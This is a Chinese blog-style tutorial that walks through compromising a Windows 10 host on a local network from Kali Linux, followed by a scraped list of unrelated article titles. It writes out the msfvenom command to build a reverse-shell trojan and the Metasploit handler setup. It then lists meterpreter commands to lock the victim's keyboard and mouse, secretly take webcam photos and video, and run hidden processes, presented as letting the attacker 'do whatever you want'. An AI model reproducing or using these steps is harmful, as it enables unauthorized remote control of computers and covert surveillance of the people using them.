kali linux外网渗透指定ip,kali Linux局域网渗透之win10
kali机:192.168.198.134
win10:192.168.198.1
我们先来查看下自己的IP地址
watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (587.31 KB, 下载次数: 15)
2020-1-17 15:36 上传
接着我们使用fping来扫描一下局域网内的所有IP
fping -g IP/24 -->扫描局域网内所有IP
watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (629.88 KB, 下载次数: 10)
2020-1-17 15:36 上传
攻击正式开始
1.我们先用msfvenom来生成一个木马文件,它将在root目录生成一个名叫shell.exe文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.198.134 lport=5555 -f exe R > /root/shell.exe
LHOST -->本地的IP地址
LPORT -->反向连接到主机的端口
R> -->木马生成的保存输出路径
watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (533.32 KB, 下载次数: 16)
2020-1-17 15:36 上传
2.打开msfconsole,键入以下代码
msf > use exploit/multi/handler -->设置模块
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp -->设置payload为反向tcp连接
msf exploit(multi/handler) > set lhost 192.168.198.134 -->设置本地的IP地址
msf exploit(multi/handler) > set lport 5555 -->设置端口,需要跟前面生成的木马端口一致
watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (565.29 KB, 下载次数: 14)
2020-1-17 15:36 上传
开始攻击
exploit -->执行攻击命令
watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (570.52 KB, 下载次数: 12)
2020-1-17 15:36 上传
3.现在我把马放在自己本机上,由于隐私问题我们不放图片了
现在我们来运行shell.exe,然而并没有什么反应,但实际上木马已经运行了,kali也监听到了
watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (583.66 KB, 下载次数: 14)
2020-1-17 15:36 上传
4.开始搞事
现在你又可以为所欲为了
部分指令如下
uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all] -->开启或禁止键盘/鼠标
uictl disable mouse -->禁用鼠标
uictl disable keyboard -->禁用键盘
webcam摄像头命令
webcam_list -->查看摄像头
webcam_snap -->通过摄像头拍照
webcam_stream -->通过摄像头开启视频
execute执行文件
execute -->在目标机中执行文件
execute -H -i -f cmd.exe -->创建新进程cmd.exe,-H不可见,-i交互详细指令请见:先知社区
我们以查看自己当前所在用户组为例
执行shell来运行cmd
watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (600.23 KB, 下载次数: 16)
2020-1-17 15:36 上传
可以看出我们的用户名叫sievr,归属于sievr用户组
然后我们来验证一下
watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (434.9 KB, 下载次数: 12)
2020-1-17 15:36 上传
完全正确
好的本次教程就到这里,有不懂的欢迎私信!
kali linux外网渗透指定ip,kali Linux局域网渗透之win10相关推荐
- Linux外网远程登录访问内网主机
Linux外网远程登录访问内网主机 远程登录软件:Xshell6 主机系统:ubuntu-19.10-desktop-amd64 连接协议:ssh 虚拟机:VMware Workstation 16 ...
- [记录]阿里云云服务器启动nginx,服务器可以通过localhost:80能够访问,外网无法通过ip访问80端口
阿里云云服务器启动nginx后,服务器可以通过localhost:80能够访问,外网无法通过ip访问80端口 问题描述:在阿里云服务器上安装好nginx,配置好前端文件夹路径后,通过ip:80无法响应 ...
- 乐鑫esp8266学习rtos3.0笔记第12篇:无需外网,如何实现在本地局域网与控制端做数据交换,分享开发心得。(附带demo)
本系列博客学习由非官方人员 半颗心脏 潜心所力所写,不做开发板.仅仅做个人技术交流分享,不做任何商业用途.如有不对之处,请留言,本人及时更改. 1. Esp8266之 搭建开发环境,开始一个" ...
- Server-U 访问外网服务器指定端口(内网21端口,外网其他端口)
1.安装server-u,创建用户和域自行百度. 2.先使用同一局域网使用xftp或FileZilla工具进行测试,同一网端无法连接成功请自行百度,这里不详细描述. 3.内外网映射 例如:内网使用ft ...
- red hat关于桥接模式连不上外网或者没有IP
很多人·在启动虚拟机后连接不上外网,即ifconfig没有ip地址,我总结了一下需要注意的地方: 以下全是在桥接模式. 1.在windows中打开任务管理器-->服务中找到一下几个服务,确保它们 ...
- xenapp 发布到外网更改公网IP。
更改外网IP时需同时更改 web site 安全访问中配置的公网地址. 转载于:https://blog.51cto.com/feige/921127
- linux外网服务器跳转内网服务器实现内网访问(iptables)
服务器信息如下 外网服务器:eth0:公网IP eth1:内网IP(192.168.10.205) 公网对外提供服务,内网IP与内部局域网通信. 配置过程: (1)开启iptables service ...
- Elasticsearch外网无法通过ip访问
目录 1 遇到的问题 2 解决方法 1 遇到的问题 外网服务器安装 elasticsearch,解压elasticsearch之后,启动,通过 http://localhost:9200 可以访问的到 ...
- 一张图理解内网、外网、动态IP
大家都知道中国是一个IPV4地址严重缺乏的国家,所以我们的拨号宽带一直都是动态IP,没有固定IP,后来更过分的是很多城市出现了内网IP,还有我们所有的二级宽带ISP提供的都是内网IP,内网IP越来越多 ...
最新文章
- 七夕要到了,用Python比心表白
- 构建SpringCloud项目基础框架
- mysql无法添加或更新子行_违反完整性约束:1452无法添加或更新子行:
- linux 禁用日志,清除linux系统日志,禁用linux系统日志,删除linux日志
- 实现服务器负载均衡常见的四种技术
- MySQLi学习笔记 :二( 排序查询,聚合函数,分组查询,分页查询) 约束 多表之间的关系 范式 数据库的备份和还原
- 年味十足的手绘年画风新年春节海报PSD模板
- 行为型设计模式之解释器模式(Interpreter)
- 实验4-1-8 求给定精度的简单交错序列部分和 (15 分)
- 为何要进入互联网行业做产品经理?
- Retrofit的简单封装
- 魔兽世界稳定服务器,魔兽世界美服服务器趋于稳定 排队新技术将实装
- 贵州师范学院数学与计算机科学,2018年贵州师范大学数学与计算机科学学院720数学分析考研基础五套测试题...
- 互联网+机器人”碰撞出啥样火花? 华数机器人以大数据云平台为智能制造连接“大脑”...
- 玩物得志:效率为王!如何构建大数据平台?
- 后端/Java/大数据/C++ 校招内推面经
- MongoDB 安全控制角色说明
- BDLS协议重磅发布 — Sperax启动Bug Bounty计划
- 什么是接口测试?接口测试的流程步骤
- (侯捷C++)1.1面向对象高级编程(上)
热门文章
- 任正非最新讲话:18年华为没有1项原创发明
- 教程篇(5.4) 03. FortiManager 设备注册 ❀ Fortinet 网络安全专家 NSE5
- php 图片印章_PHP实现中文圆形印章特效
- JME3教程:Android创建一个简单的示例
- 矩阵求和 c语言 简单易懂
- vba按原格式批量合并word文档
- (附源码)ssm高校学生档案信息管理系统 毕业设计 010936
- conda虚拟环境中 安装 jupyter notebook
- VS2010设计rdlc报表时找不到“报表数据”选项卡的解决方法
- 基于java的滑雪场学具租赁管理系统计算机毕业设计源码+系统+lw文档+mysql数据库+调试部署